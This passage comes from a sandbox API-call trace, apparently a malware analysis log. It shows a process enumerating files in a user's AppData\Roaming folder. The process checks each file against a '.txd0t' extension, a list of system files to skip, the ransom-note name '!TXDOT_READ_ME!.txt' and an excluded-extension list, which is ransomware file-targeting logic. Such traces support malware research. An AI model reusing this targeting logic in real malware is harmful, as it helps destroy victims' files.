psz2=".") returned 1 [0072.320] StrCmpW (psz1="Macromedia", psz2="..") returned 1 [0072.320] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Macromedia", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia" [0072.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\system32\\") returned 0x0 [0072.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\system\\") returned 0x0 [0072.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.320] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Macromedia", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Macromedia" [0072.320] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf521500, ftCreationTime.dwHighDateTime=0x1d5e90a, ftLastAccessTime.dwLowDateTime=0x98dc9440, ftLastAccessTime.dwHighDateTime=0x1d5e9db, ftLastWriteTime.dwLowDateTime=0x98dc9440, ftLastWriteTime.dwHighDateTime=0x1d5e9db, nFileSizeHigh=0x0, nFileSizeLow=0x15e60, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mFz6aNQKv94_Rr.mkv", cAlternateFileName="MFZ6AN~1.MKV")) returned 1 [0072.320] StrCmpW (psz1="mFz6aNQKv94_Rr.mkv", psz2=".") returned 1 [0072.320] StrCmpW (psz1="mFz6aNQKv94_Rr.mkv", psz2="..") returned 1 [0072.320] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.320] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mFz6aNQKv94_Rr.mkv", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" [0072.320] PathFindExtensionW (pszPath="mFz6aNQKv94_Rr.mkv") returned=".mkv" [0072.320] StrCmpW (psz1=".mkv", psz2=".txd0t") returned -1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="bootsect.bak") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="iconcache.db") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="thumbs.db") returned -1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2=" ransomware ") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2=" ransom ") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="debug.txt") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="boot.ini") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="desktop.ini") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="autorun.inf") returned 1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="ntuser.dat") returned -1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="ntldr") returned -1 [0072.320] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="ntdetect.com") returned -1 [0072.321] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="bootfont.bin") returned 1 [0072.321] StrCmpIW (psz1="mFz6aNQKv94_Rr.mkv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.321] PathFindExtensionW (pszPath="mFz6aNQKv94_Rr.mkv") returned=".mkv" [0072.321] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mkv") returned 0x0 [0072.321] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.321] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.321] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.326] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.326] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mFz6aNQKv94_Rr.mkv" [0072.327] SetEvent (hEvent=0x3fc) returned 1 [0072.327] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x210870f2, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0xee6ea6d8, ftLastAccessTime.dwHighDateTime=0x1d47c36, ftLastWriteTime.dwLowDateTime=0xee6ea6d8, ftLastWriteTime.dwHighDateTime=0x1d47c36, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0072.327] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0072.327] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0072.327] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x707d980, ftCreationTime.dwHighDateTime=0x1d5e7a6, ftLastAccessTime.dwLowDateTime=0xdc072a60, ftLastAccessTime.dwHighDateTime=0x1d5efd4, ftLastWriteTime.dwLowDateTime=0xdc072a60, ftLastWriteTime.dwHighDateTime=0x1d5efd4, nFileSizeHigh=0x0, nFileSizeLow=0x14c5a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mlrbk-2k1.jpg", cAlternateFileName="MLRBK-~1.JPG")) returned 1 [0072.327] StrCmpW (psz1="mlrbk-2k1.jpg", psz2=".") returned 1 [0072.327] StrCmpW (psz1="mlrbk-2k1.jpg", psz2="..") returned 1 [0072.327] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.327] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.327] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="mlrbk-2k1.jpg", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" [0072.327] PathFindExtensionW (pszPath="mlrbk-2k1.jpg") returned=".jpg" [0072.327] StrCmpW (psz1=".jpg", psz2=".txd0t") returned -1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="bootsect.bak") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="iconcache.db") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="thumbs.db") returned -1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2=" ransomware ") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2=" ransom ") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="debug.txt") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="boot.ini") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="desktop.ini") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="autorun.inf") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="ntuser.dat") returned -1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="ntldr") returned -1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="ntdetect.com") returned -1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="bootfont.bin") returned 1 [0072.327] StrCmpIW (psz1="mlrbk-2k1.jpg", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.327] PathFindExtensionW (pszPath="mlrbk-2k1.jpg") returned=".jpg" [0072.328] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".jpg") returned 0x0 [0072.328] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.328] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.328] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.334] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.334] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\mlrbk-2k1.jpg" [0072.334] SetEvent (hEvent=0x418) returned 1 [0072.334] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfafe15e1, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfd8b64ce, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfd8b64ce, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0072.334] StrCmpW (psz1="Mozilla", psz2=".") returned 1 [0072.334] StrCmpW (psz1="Mozilla", psz2="..") returned 1 [0072.334] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.334] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.334] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="Mozilla", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla" [0072.334] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\system32\\") returned 0x0 [0072.334] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\syswow64\\") returned 0x0 [0072.334] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\system\\") returned 0x0 [0072.335] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\windows\\winsxs\\") returned 0x0 [0072.335] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla", lpSrch="\\appdata\\roaming\\") returned="\\AppData\\Roaming\\Mozilla" [0072.335] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x192c2260, ftCreationTime.dwHighDateTime=0x1d5ed5a, ftLastAccessTime.dwLowDateTime=0x19771aa0, ftLastAccessTime.dwHighDateTime=0x1d5e863, ftLastWriteTime.dwLowDateTime=0x19771aa0, ftLastWriteTime.dwHighDateTime=0x1d5e863, nFileSizeHigh=0x0, nFileSizeLow=0x9184, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="n5hRh8HkX hRtD-9n.png", cAlternateFileName="N5HRH8~1.PNG")) returned 1 [0072.335] StrCmpW (psz1="n5hRh8HkX hRtD-9n.png", psz2=".") returned 1 [0072.335] StrCmpW (psz1="n5hRh8HkX hRtD-9n.png", psz2="..") returned 1 [0072.335] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.335] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.335] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="n5hRh8HkX hRtD-9n.png", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" [0072.335] PathFindExtensionW (pszPath="n5hRh8HkX hRtD-9n.png") returned=".png" [0072.335] StrCmpW (psz1=".png", psz2=".txd0t") returned -1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="bootsect.bak") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="iconcache.db") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="thumbs.db") returned -1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2=" ransomware ") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2=" ransom ") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="debug.txt") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="boot.ini") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="desktop.ini") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="autorun.inf") returned 1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="ntuser.dat") returned -1 [0072.335] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="ntldr") returned -1 [0072.336] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="ntdetect.com") returned -1 [0072.336] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="bootfont.bin") returned 1 [0072.336] StrCmpIW (psz1="n5hRh8HkX hRtD-9n.png", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.336] PathFindExtensionW (pszPath="n5hRh8HkX hRtD-9n.png") returned=".png" [0072.336] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".png") returned 0x0 [0072.336] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.336] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.336] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x1 [0072.343] StrCpyW (in: psz1=0xea7e00, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.343] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\n5hRh8HkX hRtD-9n.png" [0072.343] SetEvent (hEvent=0x408) returned 1 [0072.343] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3b5f9690, ftCreationTime.dwHighDateTime=0x1d5e9aa, ftLastAccessTime.dwLowDateTime=0xc0b6aad0, ftLastAccessTime.dwHighDateTime=0x1d5f059, ftLastWriteTime.dwLowDateTime=0xc0b6aad0, ftLastWriteTime.dwHighDateTime=0x1d5f059, nFileSizeHigh=0x0, nFileSizeLow=0xe973, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PDHYzrp.wav", cAlternateFileName="")) returned 1 [0072.343] StrCmpW (psz1="PDHYzrp.wav", psz2=".") returned 1 [0072.343] StrCmpW (psz1="PDHYzrp.wav", psz2="..") returned 1 [0072.343] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.343] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.343] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PDHYzrp.wav", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" [0072.343] PathFindExtensionW (pszPath="PDHYzrp.wav") returned=".wav" [0072.343] StrCmpW (psz1=".wav", psz2=".txd0t") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="bootsect.bak") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="iconcache.db") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="thumbs.db") returned -1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2=" ransomware ") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2=" ransom ") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="debug.txt") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="boot.ini") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="desktop.ini") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="autorun.inf") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="ntuser.dat") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="ntldr") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="ntdetect.com") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="bootfont.bin") returned 1 [0072.343] StrCmpIW (psz1="PDHYzrp.wav", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.343] PathFindExtensionW (pszPath="PDHYzrp.wav") returned=".wav" [0072.344] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".wav") returned 0x0 [0072.344] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.344] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.344] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0072.460] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.460] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PDHYzrp.wav" [0072.460] SetEvent (hEvent=0x3fc) returned 1 [0072.461] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd4dde220, ftCreationTime.dwHighDateTime=0x1d5ee16, ftLastAccessTime.dwLowDateTime=0xc522b3d0, ftLastAccessTime.dwHighDateTime=0x1d5ea40, ftLastWriteTime.dwLowDateTime=0xc522b3d0, ftLastWriteTime.dwHighDateTime=0x1d5ea40, nFileSizeHigh=0x0, nFileSizeLow=0x16642, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="PjcNBr9EvQRuRkXhA.swf", cAlternateFileName="PJCNBR~1.SWF")) returned 1 [0072.461] StrCmpW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2=".") returned 1 [0072.461] StrCmpW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="..") returned 1 [0072.461] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming") returned="C:\\Users\\FD1HVy\\AppData\\Roaming" [0072.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming", psz2="\\", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\" [0072.461] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\", psz2="PjcNBr9EvQRuRkXhA.swf", cchMax=1088 | out: psz1="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf") returned="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" [0072.461] PathFindExtensionW (pszPath="PjcNBr9EvQRuRkXhA.swf") returned=".swf" [0072.461] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="bootsect.bak") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="iconcache.db") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="thumbs.db") returned -1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2=" ransomware ") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2=" ransom ") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="debug.txt") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="boot.ini") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="desktop.ini") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="autorun.inf") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="ntuser.dat") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="ntldr") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="ntdetect.com") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="bootfont.bin") returned 1 [0072.461] StrCmpIW (psz1="PjcNBr9EvQRuRkXhA.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0072.461] PathFindExtensionW (pszPath="PjcNBr9EvQRuRkXhA.swf") returned=".swf" [0072.461] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0072.461] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0072.461] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0072.461] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x3 [0072.474] StrCpyW (in: psz1=0xeb7910, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0072.474] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\PjcNBr9EvQRuRkXhA.swf" [0072.474] SetEvent (hEvent=0x418) returned 1 [0072.474] FindNextFileW (in: hFindFile=0xec23f0, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x601f7690, ftCreationTime.dwHighDateTime=0x1d5e20b, ftLastAccessTime.dwLowDateTime=0x162740b0, ftLastAccessTime.dwHighDateTime=0x1d5ef24, ftLastWriteTime.dwLowDateTime=0x162740b0, ftLastWriteTime.dwHighDateTime=0x1d5ef24, nFileSizeHigh=0x0, nFileSizeLow=0x13a70, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="pMTil.png", cAlternateFileName="")) returned 1 [0072.474] StrCmpW (psz1="pMTil.png", psz2=".") returned 1 [0072.474] StrCmpW (psz1="pMTil.png", psz2="..") returned 1 [0072.474] StrCpyNW (in: psz1=0xecf508, psz2="C:\\Users\\FD1HVy\\AppData\\Roaming", cchMax=1088 | out: 